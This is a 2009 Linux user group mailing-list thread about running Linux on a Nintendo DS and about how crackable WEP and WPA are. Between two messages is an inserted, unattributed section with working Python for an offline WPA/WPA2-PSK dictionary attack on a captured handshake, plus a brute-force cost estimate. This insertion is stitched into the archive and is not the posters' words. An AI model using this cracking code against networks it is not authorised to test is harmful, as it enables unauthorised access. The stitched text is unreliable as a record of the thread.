> >
> > http://www.obnosis.com/Layer8Wireless.html
>
> Okay, I have to take exception to how this is written.  You are
> comparing the security of WEP and WPA as if they are somehow equivalent
> or equally "easy" to crack.  That is just not true.
>
> WEP is fundamentally broken.  It can be reliably cracked in seconds, in
> most cases.  Its use is more of a "please don't use this network" flag
> than any real attempt to keep people out.
>
> WPA, on the other hand, is NOT broken.  Only one variation of it is
> crackable at all (PSK) and even then, the attack is a brute force
> dictionary attack.  By that argument, ALL password based encryption is
> crackable.
>
> Yes, you could successfully argue that since MOST home APs use PSK and
> MOST probably just set the password to 'admin' or 'linksys' or some
> other trivial name, that IN PRACTICE, it's not hard to crack most uses
> of WPA.
>
> But saying that "[c]rackers can get right in anyway" just isn't true.
> All that is needed is a reasonably difficult password.  Don't use a
> dictionary word and make it decently long and it quickly becomes far too
> difficult to crack to make it worth it for all but the most extreme
> cases.  It's either VERY expensive or takes YEARS.
>
> I'm sure that you read this:
>
>
> http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html
>
> It answers the question: "how much does it cost to crack a password?"
> It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve
> character password using the full ASCII set would cost over $8 TRILLION
> dollars to crack.  Even much smaller passwords are still in the millions.
>
> The password that I use on my WPA2-PSK AP is 20-odd chars long and spans
> the ASCII range.  Far from allowing crackers to "get right in", it's
> nearly impossible for them to do so.



-- 
Skype: (623)239-3392
AT&T: (503)754-4452
www.it-clowns.com

Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Kurt Granroth
On 11/14/09 12:02 PM, Lisa Kachold wrote:
> The whole concept of "wireless encryption security" is somewhat moot
> with airodump-ng etc tools.
>
> WEP keys are really easy to break.
>
> WPA is also easily encroached - but harder with a truly unique secure
> key (which few people use)
>
> It just exists as part of the big "security" matrix to keep the honest
> people out.  Crackers can get right in anyway!
>
> http://www.obnosis.com/Layer8Wireless.html

Okay, I have to take exception to how this is written.  You are 
comparing the security of WEP and WPA as if they are somehow equivalent 
or equally "easy" to crack.  That is just not true.

WEP is fundamentally broken.  It can be reliably cracked in seconds, in 
most cases.  Its use is more of a "please don't use this network" flag 
than any real attempt to keep people out.

WPA, on the other hand, is NOT broken.  Only one variation of it is 
crackable at all (PSK) and even then, the attack is a brute force 
dictionary attack.  By that argument, ALL password based encryption is 
crackable.

Yes, you could successfully argue that since MOST home APs use PSK and 
MOST probably just set the password to 'admin' or 'linksys' or some 
other trivial name, that IN PRACTICE, it's not hard to crack most uses 
of WPA.

But saying that "[c]rackers can get right in anyway" just isn't true. 
All that is needed is a reasonably difficult password.  Don't use a 
dictionary word and make it decently long and it quickly becomes far too 
difficult to crack to make it worth it for all but the most extreme 
cases.  It's either VERY expensive or takes YEARS.

I'm sure that you read this:

http://news.electricalchemy.net/2009/10/password-cracking-in-cloud-part-5.html

It answers the question: "how much does it cost to crack a password?" 
It assumes that you are using Amazon EC2 at $0.30 an hour.  A twelve 
character password using the full ASCII set would cost over $8 TRILLION 
dollars to crack.  Even much smaller passwords are still in the millions.

The password that I use on my WPA2-PSK AP is 20-odd chars long and spans 
the ASCII range.  Far from allowing crackers to "get right in", it's 
nearly impossible for them to do so.
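To put both halves of this exchange in concrete terms (Lisa's point that a captured handshake lets you crack WPA-PSK offline, and Kurt's point that the attack is only a dictionary/brute-force guess whose cost explodes with passphrase length), here is an added example. It is not code from anyone in this thread or from aircrack-ng. The MAC addresses, nonces, EAPOL frame and wordlist are constructed values, and the guess rate used in the cost estimate is an assumption; only the $0.30/hour EC2 price comes from the article Kurt cites. What is real is the key derivation: WPA/WPA2-PSK turns passphrase and SSID into the PMK with PBKDF2-HMAC-SHA1 at 4096 iterations, the PTK comes from the 802.11i PRF over both MACs and nonces, and the handshake MIC is an HMAC under the first 16 bytes of the PTK, so a guess can be checked against the captured MIC with no further contact with the AP.

```python
"""Offline WPA/WPA2-PSK guess-and-check, plus a brute-force cost estimate.

Added example for this thread; it is not code from anyone posting here or
from aircrack-ng. MAC addresses, nonces, the EAPOL frame, the wordlist and
the guess rate are constructed/assumed values, not captured data.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 iterations are what caps an attacker's guess rate."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Derive the PTK and return its first 16 bytes, the Key Confirmation Key (KCK)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck: bytes, eapol_zeroed_mic: bytes) -> bytes:
    """WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16]."""
    return hmac.new(kck, eapol_zeroed_mic, hashlib.sha1).digest()[:16]


@dataclass(frozen=True)
class Handshake:
    """What a sniffer needs from the 4-way handshake: both MACs, both nonces,
    message 2 with its MIC field zeroed, and the MIC the station actually sent."""
    ssid: str
    ap_mac: bytes
    sta_mac: bytes
    anonce: bytes
    snonce: bytes
    eapol: bytes
    mic: bytes


def candidate_mic(hs: Handshake, passphrase: str) -> bytes:
    pmk = pmk_from_passphrase(passphrase, hs.ssid)
    return eapol_mic(kck_from_pmk(pmk, hs.ap_mac, hs.sta_mac, hs.anonce, hs.snonce), hs.eapol)


def dictionary_attack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """Entirely offline: once hs is captured, no further traffic to the AP is needed."""
    for word in wordlist:
        if hmac.compare_digest(candidate_mic(hs, word), hs.mic):
            return word
    return None


def make_handshake(ssid: str, passphrase: str) -> Handshake:
    """Constructed sample capture: synthesise the handshake a station using this
    passphrase would produce. Every byte here is made up for the example."""
    ap_mac = bytes.fromhex("021100aabb01")
    sta_mac = bytes.fromhex("021100aabb02")
    anonce = bytes(range(0, 32))
    snonce = bytes(range(32, 64))
    eapol = bytes.fromhex("0103007502010a00") + bytes(109)  # EAPOL-Key header + zeroed body/MIC
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return Handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, eapol_mic(kck, eapol))


def brute_force_cost(charset_size: int, length: int, guesses_per_second: float,
                     dollars_per_hour: float) -> Tuple[int, float, float]:
    """Worst case to exhaust the keyspace at a fixed guess rate: (keyspace, seconds, dollars)."""
    keyspace = charset_size ** length
    seconds = keyspace / guesses_per_second
    return keyspace, seconds, seconds / 3600 * dollars_per_hour


if __name__ == "__main__":
    wordlist = ["admin", "password", "linksys", "12345678"]  # constructed toy dictionary
    print("weak PSK  :", dictionary_attack(make_handshake("linksys", "linksys"), wordlist))
    print("random PSK:", dictionary_attack(make_handshake("linksys", "Xq7!vP9#rL2&tB4"), wordlist))
    # Assumed rate: 1e6 PBKDF2 guesses per second for the whole rented fleet, at $0.30/hour.
    for charset, length in ((26, 8), (62, 8), (95, 12), (95, 20)):
        _, secs, usd = brute_force_cost(charset, length, 1e6, 0.30)
        print(f"{charset:>2}^{length:<2} worst case: {secs / 86400 / 365.25:.3g} years, ${usd:,.0f}")
```

Run it and the dictionary word is recovered from the synthetic capture while the random passphrase is not; the cost table then shows why: 26^8 lowercase falls within hours at the assumed rate, 95^12 is in the trillions of dollars, and 95^20 is beyond any budget. The exact dollar figures depend on the assumed guess rate, but the ratios between rows do not.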


Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread Lisa Kachold
On Sat, Nov 14, 2009 at 11:43 AM, AZ RUNE  wrote:

> Buy another router and set up a 2nd network with no Internet Access to test
> it on WEP.
>
> Brian
>

The whole concept of "wireless encryption security" is somewhat moot with
airodump-ng etc tools.

WEP keys are really easy to break.

WPA is also easily encroached - but harder with a truly unique secure key
(which few people use)

It just exists as part of the big "security" matrix to keep the honest
people out.  Crackers can get right in anyway!

http://www.obnosis.com/Layer8Wireless.html


Re: running Linux on odd devices is SOOO COOL!

2009-11-14 Thread AZ RUNE
Buy another router and set up a 2nd network with no Internet Access to test
it on WEP.

Brian

On Fri, Nov 13, 2009 at 11:27 PM, Steven A. DuChene <
linux-clust...@mindspring.com> wrote:

> Well, I discovered according to the dslinux docs that the wireless
> support only works with no encryption or WEP. No WPA or WPA2 support is
> planned.
>
> Unfortunately I have my wireless router setup and working with WPA2
>
> Nuts!  I was looking forward to ssh'ing to the NDS from my
> desktop system. :-)
>
>

Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread Steven A. DuChene
Well, I discovered according to the dslinux docs that the wireless
support only works with no encryption or WEP. No WPA or WPA2 support is planned.

Unfortunately I have my wireless router setup and working with WPA2

Nuts!  I was looking forward to ssh'ing to the NDS from my
desktop system. :-)

-Original Message-
>From: Alan Dayley 
>Sent: Nov 14, 2009 1:08 AM
>To: "Steven A. DuChene" , Main PLUG discussion 
>list 
>Subject: Re: running Linux on odd devices is SOOO COOL!
>
>What fun!  Keep playing and learning.
>
>Alan
>
>On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
> wrote:
>> So I am running a special version of Linux on my son's Nintendo DS Lite 
>> handheld game console!
>>
>> It is so cool!





Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread Alan Dayley
What fun!  Keep playing and learning.

Alan

On Fri, Nov 13, 2009 at 10:34 PM, Steven A. DuChene
 wrote:
> So I am running a special version of Linux on my son's Nintendo DS Lite 
> handheld game console!
>
> It is so cool!
>
>


Re: running Linux on odd devices is SOOO COOL!

2009-11-13 Thread mike havens
that is so cool!

On 11/13/09, Steven A. DuChene  wrote:
>
> So I am running a special version of Linux on my son's Nintendo DS Lite
> handheld game console!
>
> It is so cool!
>
>



-- 
:-)~MIKE~(-: